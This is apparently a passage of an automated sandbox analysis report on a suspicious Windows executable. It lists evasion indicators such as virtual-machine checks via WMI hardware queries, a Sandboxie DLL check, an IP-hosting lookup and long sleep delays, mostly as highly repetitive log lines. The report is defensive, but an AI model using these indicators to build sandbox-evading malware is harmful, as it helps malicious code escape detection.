                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599125Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598906Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598793Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598468Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598359Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598250Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598140Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598031Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597921Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597812Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597703Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597593Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597484Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597374Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597265Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597046Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596935Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596715Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596499Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596390Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596281Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596171Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596062Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595953Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595843Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595734Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595625Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595515Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595296Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594959Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594718Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594607Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWindow / User API: threadDelayed 8370Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWindow / User API: threadDelayed 1486Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7480Thread sleep count: 8370 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7480Thread sleep count: 1486 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -599015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598793s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -598031s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597921s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597812s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597593s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597484s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597374s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597265s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -597046s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596935s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596715s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596609s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596499s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596390s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596171s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -596062s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595843s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595625s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595296s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595187s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -595078s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -594959s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -594828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -594718s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe TID: 7476Thread sleep time: -594607s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599125Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598906Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598793Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598468Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598359Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598250Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598140Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 598031Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597921Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597812Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597703Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597593Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597484Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597374Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597265Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 597046Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596935Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596715Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596499Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596390Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596281Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596171Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 596062Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595953Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595843Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595734Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595625Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595515Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595296Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594959Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594718Jump to behavior
